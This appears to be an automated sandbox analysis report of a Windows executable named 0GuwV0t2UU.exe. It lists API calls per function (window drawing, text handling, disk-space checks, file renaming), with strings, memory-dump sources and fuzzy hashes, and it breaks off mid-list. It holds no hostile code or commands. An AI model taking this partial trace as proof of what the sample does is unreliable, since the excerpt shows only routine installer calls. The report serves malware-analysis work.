                                                        • Part of subcall function 00406950: CharPrevW.USER32(?,?,75573420,C:\Users\user\AppData\Local\Temp\,00000000,00403640,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040394F,?,00000008,0000000A,0000000C), ref: 004069DA
                                                      • GetDiskFreeSpaceW.KERNEL32(00420F18,?,?,0000040F,?,00420F18,00420F18,?,00000001,00420F18,?,?,000003FB,?), ref: 00404D5A
                                                      • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404D75
                                                        • Part of subcall function 00404ECE: lstrlenW.KERNEL32(00422F48,00422F48,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404F6F
                                                        • Part of subcall function 00404ECE: wsprintfW.USER32 ref: 00404F78
                                                        • Part of subcall function 00404ECE: SetDlgItemTextW.USER32(?,00422F48), ref: 00404F8B
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2399890935.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2399866348.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399916876.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                      • String ID: A$C:\Users\user\fllesskabsejede\Modfaldent$Call$H/B
                                                      • API String ID: 2624150263-1248410248
                                                      • Opcode ID: 5391f58817f8cb56906519b00545e03f0092e071ef6120135fd40e88676cc4e1
                                                      • Instruction ID: d1d33be9ed2b3c34a6912e34267e60509d8c64d33f654f2361a06684bbdb7283
                                                      • Opcode Fuzzy Hash: 5391f58817f8cb56906519b00545e03f0092e071ef6120135fd40e88676cc4e1
                                                      • Instruction Fuzzy Hash: FBA191B1900209ABDB11AFA5CD41AEFB7B8FF84754F11843BF601B62D1DB7C89418B69
                                                      APIs
                                                      • CoCreateInstance.OLE32(004084DC,?,00000001,004084CC,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040224E
                                                      Strings
                                                      • C:\Users\user\fllesskabsejede\Modfaldent, xrefs: 0040228E
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2399890935.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2399866348.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399916876.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID: CreateInstance
                                                      • String ID: C:\Users\user\fllesskabsejede\Modfaldent
                                                      • API String ID: 542301482-1663555385
                                                      • Opcode ID: 0140e218fa6805cd9e9d549b3f46d2fa505c0e185024ac1d7b568c254fc15d58
                                                      • Instruction ID: 6ff6f317fb38c44f87062c5feee8d19efe767a13196ba6052caed3a8697b1732
                                                      • Opcode Fuzzy Hash: 0140e218fa6805cd9e9d549b3f46d2fa505c0e185024ac1d7b568c254fc15d58
                                                      • Instruction Fuzzy Hash: 57410575A00209AFCB00DFE4CA89A9D7BB5FF48318B20457EF505EB2D1DB799981CB54
                                                      APIs
                                                      • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040487E
                                                      • GetDlgItem.USER32(?,000003E8), ref: 00404892
                                                      • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004048AF
                                                      • GetSysColor.USER32(?), ref: 004048C0
                                                      • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004048CE
                                                      • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004048DC
                                                      • lstrlenW.KERNEL32(?), ref: 004048E1
                                                      • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004048EE
                                                      • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404903
                                                      • GetDlgItem.USER32(?,0000040A), ref: 0040495C
                                                      • SendMessageW.USER32(00000000), ref: 00404963
                                                      • GetDlgItem.USER32(?,000003E8), ref: 0040498E
                                                      • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004049D1
                                                      • LoadCursorW.USER32(00000000,00007F02), ref: 004049DF
                                                      • SetCursor.USER32(00000000), ref: 004049E2
                                                      • LoadCursorW.USER32(00000000,00007F00), ref: 004049FB
                                                      • SetCursor.USER32(00000000), ref: 004049FE
                                                      • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404A2D
                                                      • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404A3F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2399890935.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2399866348.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399916876.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                      • String ID: Call$N$WG@
                                                      • API String ID: 3103080414-3807701841
                                                      • Opcode ID: 0408aea07e4224223b1525a80d6e9a5543208d2b5c1b62ae9aa87092746790f3
                                                      • Instruction ID: 54d9d544d8a339ed1f673c4731e81340660bcd02aea44dc88bd758a97d32eb83
                                                      • Opcode Fuzzy Hash: 0408aea07e4224223b1525a80d6e9a5543208d2b5c1b62ae9aa87092746790f3
                                                      • Instruction Fuzzy Hash: 2B61A0B1A40209BFDB10AF64CD85AAA7B69FB84314F00843AF605B72D0C779AD51CF98
                                                      APIs
                                                      • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,00406483,?,?), ref: 00406323
                                                      • GetShortPathNameW.KERNEL32(?,004265E8,00000400), ref: 0040632C
                                                        • Part of subcall function 004060F7: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004063DC,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406107
                                                        • Part of subcall function 004060F7: lstrlenA.KERNEL32(00000000,?,00000000,004063DC,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406139
                                                      • GetShortPathNameW.KERNEL32(?,00426DE8,00000400), ref: 00406349
                                                      • wsprintfA.USER32 ref: 00406367
                                                      • GetFileSize.KERNEL32(00000000,00000000,00426DE8,C0000000,00000004,00426DE8,?,?,?,?,?), ref: 004063A2
                                                      • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 004063B1
                                                      • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004063E9
                                                      • SetFilePointer.KERNEL32(0040A5B0,00000000,00000000,00000000,00000000,004261E8,00000000,-0000000A,0040A5B0,00000000,[Rename],00000000,00000000,00000000), ref: 0040643F
                                                      • GlobalFree.KERNEL32(00000000), ref: 00406450
                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00406457
                                                        • Part of subcall function 00406192: GetFileAttributesW.KERNELBASE(00000003,00403138,C:\Users\user\Desktop\0GuwV0t2UU.exe,80000000,00000003), ref: 00406196
                                                        • Part of subcall function 00406192: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 004061B8
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2399890935.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2399866348.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399916876.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                      • String ID: %ls=%ls$[Rename]$eB$mB$mB
                                                      • API String ID: 2171350718-2529913679
                                                      • Opcode ID: db523023045b127196975f0173c88122861a3a00dd6e7a8812d5311d7169504c
                                                      • Instruction ID: 9150ff15d44dd6ac7e39c2a3973aa46bc34ee9e674c79fba1fcd409278ee571c
                                                      • Opcode Fuzzy Hash: db523023045b127196975f0173c88122861a3a00dd6e7a8812d5311d7169504c
                                                      • Instruction Fuzzy Hash: A0312370600325BBD2206F65AD49F6B3A5CDF41754F12403AFA02B62D3DA7CD82586BD
                                                      APIs
                                                      • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                      • BeginPaint.USER32(?,?), ref: 00401047
                                                      • GetClientRect.USER32(?,?), ref: 0040105B
                                                      • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                      • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                      • DeleteObject.GDI32(?), ref: 004010ED
                                                      • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                      • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                      • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                      • SelectObject.GDI32(00000000,?), ref: 00401140
                                                      • DrawTextW.USER32(00000000,00428A60,000000FF,00000010,00000820), ref: 00401156
                                                      • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                      • DeleteObject.GDI32(?), ref: 00401165
                                                      • EndPaint.USER32(?,?), ref: 0040116E
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2399890935.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2399866348.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399916876.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                      • String ID: F
                                                      • API String ID: 941294808-1304234792
                                                      • Opcode ID: 9a1d1952d02a6587733a796de720c08d05f060e36ce2c67ddab1b612aed24319
                                                      • Instruction ID: 3c33d73dbc2ffdf14e434cca4ae815e9cfbd561affca8d3971a90777bf4c3be5
                                                      • Opcode Fuzzy Hash: 9a1d1952d02a6587733a796de720c08d05f060e36ce2c67ddab1b612aed24319
                                                      • Instruction Fuzzy Hash: 34418B71800249AFCF058FA5DE459AFBBB9FF45314F00802EF592AA1A0CB34DA55DFA4
                                                      APIs
                                                      • CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\0GuwV0t2UU.exe",75573420,C:\Users\user\AppData\Local\Temp\,00000000,00403640,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040394F,?,00000008,0000000A,0000000C), ref: 004069B3
                                                      • CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 004069C2
                                                      • CharNextW.USER32(?,"C:\Users\user\Desktop\0GuwV0t2UU.exe",75573420,C:\Users\user\AppData\Local\Temp\,00000000,00403640,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040394F,?,00000008,0000000A,0000000C), ref: 004069C7
                                                      • CharPrevW.USER32(?,?,75573420,C:\Users\user\AppData\Local\Temp\,00000000,00403640,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040394F,?,00000008,0000000A,0000000C), ref: 004069DA
                                                      Strings
                                                      • *?|<>/":, xrefs: 004069A2
                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 00406951
                                                      • "C:\Users\user\Desktop\0GuwV0t2UU.exe", xrefs: 00406994
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2399890935.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2399866348.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399916876.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID: Char$Next$Prev
                                                      • String ID: "C:\Users\user\Desktop\0GuwV0t2UU.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                      • API String ID: 589700163-2873884980
                                                      • Opcode ID: 7c4491ab095b24fecdd0000f8ec6f0e383ca7ce11269c465865605e120ff5cd6
                                                      • Instruction ID: ee050b90af12f7da754e5e1a7cefda923f304df8a209a79dab08f9ec4fc7f4f9
                                                      • Opcode Fuzzy Hash: 7c4491ab095b24fecdd0000f8ec6f0e383ca7ce11269c465865605e120ff5cd6
                                                      • Instruction Fuzzy Hash: 0311B695800612A5DB303B148D40AB7A2F8AF55794F52403FED9AB3AC1EB7C4C9286BD
                                                      APIs
                                                      • GetWindowLongW.USER32(?,000000EB), ref: 004046A5
                                                      • GetSysColor.USER32(00000000), ref: 004046E3
                                                      • SetTextColor.GDI32(?,00000000), ref: 004046EF
                                                      • SetBkMode.GDI32(?,?), ref: 004046FB
                                                      • GetSysColor.USER32(?), ref: 0040470E
                                                      • SetBkColor.GDI32(?,?), ref: 0040471E
                                                      • DeleteObject.GDI32(?), ref: 00404738
                                                      • CreateBrushIndirect.GDI32(?), ref: 00404742
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2399890935.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2399866348.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399916876.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                      • String ID:
                                                      • API String ID: 2320649405-0
                                                      • Opcode ID: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
                                                      • Instruction ID: dc9e33635e48260261a40037ac820fc698cd45b4c1bae75aa0874807b7806060
                                                      • Opcode Fuzzy Hash: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
                                                      • Instruction Fuzzy Hash: B321A7715007049BCB309F38DA48B5B7BF4AF82714B00893DE9A6B72E0D778E904CB58
                                                      APIs
                                                      • lstrlenW.KERNEL32(00421F28,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030CD,00000000,?), ref: 0040575F
                                                      • lstrlenW.KERNEL32(004030CD,00421F28,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030CD,00000000), ref: 0040576F
                                                      • lstrcatW.KERNEL32(00421F28,004030CD,004030CD,00421F28,00000000,00000000,00000000), ref: 00405782
                                                      • SetWindowTextW.USER32(00421F28,00421F28), ref: 00405794
                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004057BA
                                                      • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004057D4
                                                      • SendMessageW.USER32(?,00001013,?,00000000), ref: 004057E2
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2399890935.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2399866348.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399916876.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                      • String ID:
                                                      • API String ID: 2531174081-0
                                                      • Opcode ID: 478899543bd82950d8a4d30903f75c7e93d106f960787587e0f6081d0d83e678
                                                      • Instruction ID: 5626e068ca8b5f19a977ecdc4b6aac72793d852c885f634865ceb3a8b40a731b
                                                      • Opcode Fuzzy Hash: 478899543bd82950d8a4d30903f75c7e93d106f960787587e0f6081d0d83e678
                                                      • Instruction Fuzzy Hash: 6F218E71900558FACB119F65DD849CFBFB9EF45350F10803AF904B62A0C7794A819F68
                                                      APIs
                                                      • DestroyWindow.USER32(00000000,00000000), ref: 0040306E
                                                      • GetTickCount.KERNEL32 ref: 0040308C
                                                      • wsprintfW.USER32 ref: 004030BA
                                                        • Part of subcall function 00405727: lstrlenW.KERNEL32(00421F28,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030CD,00000000,?), ref: 0040575F
                                                        • Part of subcall function 00405727: lstrlenW.KERNEL32(004030CD,00421F28,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030CD,00000000), ref: 0040576F
                                                        • Part of subcall function 00405727: lstrcatW.KERNEL32(00421F28,004030CD,004030CD,00421F28,00000000,00000000,00000000), ref: 00405782
                                                        • Part of subcall function 00405727: SetWindowTextW.USER32(00421F28,00421F28), ref: 00405794
                                                        • Part of subcall function 00405727: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004057BA
                                                        • Part of subcall function 00405727: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004057D4
                                                        • Part of subcall function 00405727: SendMessageW.USER32(?,00001013,?,00000000), ref: 004057E2
                                                      • CreateDialogParamW.USER32(0000006F,00000000,00402FB8,00000000), ref: 004030DE
                                                      • ShowWindow.USER32(00000000,00000005), ref: 004030EC
                                                        • Part of subcall function 00403037: MulDiv.KERNEL32(0002E1C6,00000064,000356F4), ref: 0040304C
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2399890935.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2399866348.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399916876.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                      • String ID: ... %d%%
                                                      • API String ID: 722711167-2449383134
                                                      • Opcode ID: e30de3e9c70cc1782be0847fd193c9846037557e070c342b8441f703718ebcd4
                                                      • Instruction ID: 97c902a025ac2946b461c4c6cbd0392064296d6115d029b2f7da86e316ad9030
                                                      • Opcode Fuzzy Hash: e30de3e9c70cc1782be0847fd193c9846037557e070c342b8441f703718ebcd4
                                                      • Instruction Fuzzy Hash: 5901A530542320EBCB31AF60AE0AA6B7F6CAB00702F54443BF441B15D5CAB84641CB9E
                                                      APIs
                                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404FF7
                                                      • GetMessagePos.USER32 ref: 00404FFF
                                                      • ScreenToClient.USER32(?,?), ref: 00405019
                                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 0040502B
                                                      • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00405051
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2399890935.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2399866348.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399916876.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
